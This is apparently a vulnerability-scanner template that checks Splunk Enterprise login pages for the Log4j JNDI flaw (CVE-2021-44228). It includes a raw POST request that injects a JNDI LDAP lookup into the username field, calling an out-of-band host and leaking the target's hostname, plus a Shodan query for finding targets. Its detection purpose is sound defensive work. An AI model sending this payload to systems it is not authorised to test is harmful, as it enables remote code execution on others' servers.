id: splunk-enterprise-log4j-rce

info:
  name: Splunk Enterprise - Remote Code Execution (Apache Log4j)
  author: shaikhyaser
  severity: critical
  description: |
    Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
  reference:
    - https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-77
  metadata:
    max-request: 1
    shodan-query: http.title:"Login - Splunk"
  tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev

variables:
  rand1: '{{rand_int(111, 999)}}'
  rand2: '{{rand_int(111, 999)}}'
  str: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /en-US/account/login HTTP/1.1
        Host: {{Hostname}}
        Accept: text/javascript, text/html, application/xml, text/xml, */*
        X-Requested-With: XMLHttpRequest
        Origin: {{RootURL}}
        Referer: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        cval={{unix_time()}}&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&return_to=%2Fen-US%2F

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'

    extractors:
      - type: kval
        kval:
          - interactsh_ip

      - type: regex
        part: interactsh_request
        group: 2
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
# digest: 490a004630440220710929465f8a77ba76bd194093d158488b54954b4cbbeb2494fa76f18edd861802203d0bc07faaf77ec5f71f05b8124d0e477e5b07f9b9d3c43e9ea2f23662f65e23:922c64590222798bb761d5b6d8e72950